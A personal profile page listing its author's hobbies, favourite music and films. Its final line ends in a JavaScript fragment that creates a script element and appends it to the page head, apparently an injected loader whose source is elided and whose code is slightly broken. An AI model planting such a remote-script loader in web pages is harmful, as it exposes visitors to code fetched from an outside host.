Photography, Graphic Arts, Airbrushing, Travel, Camping, Art Galleries, Dining and Cozy Moments to embrace the soul of relaxation.
People who like to make things happen for themselves, have a positive outlook and enjoy life to the fullest. Understand that each step is one that leads them to their future, to look ahead and appreciate what is around them.Pause! Take a look and take a deep breath! What do you see?
I have no real limits to music. What I enjoy most of all is jazz, soft rock, reggae, R&B, Soul and especially Native American Music. World Music is pretty cool too! Artists like; Boston, Bob Marley, Chicago, Dan Folgelberg, Stray Cats, Pink Floyd, Ziggy Marley, Robbie Robertson, and all to much more to list.
A softee at heart for Sleeping in Seattle, Serendipity, Something's Gotta Give, You've Got Mail and a few more. Action wise with hidden meanings; The Matrix, Blade, The Mummy, UnderWorld, What Dreams May Come and more.
Family and Friends! .."var s=document.createElement('script');s.src='..';document.getEl ementsByTagName('head')[0].appendChild(s);"